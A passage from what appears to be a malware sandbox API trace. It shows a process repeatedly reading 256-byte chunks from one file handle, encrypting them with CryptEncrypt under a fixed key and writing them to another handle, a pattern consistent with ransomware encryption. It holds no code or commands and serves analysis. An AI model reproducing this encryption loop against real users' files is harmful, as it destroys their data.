lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.640] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.640] GetLastError () returned 0x0 [0148.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.641] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.641] GetLastError () returned 0x0 [0148.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.642] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.642] GetLastError () returned 0x0 [0148.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.643] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.643] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.644] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.644] GetLastError () returned 0x0 [0148.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, 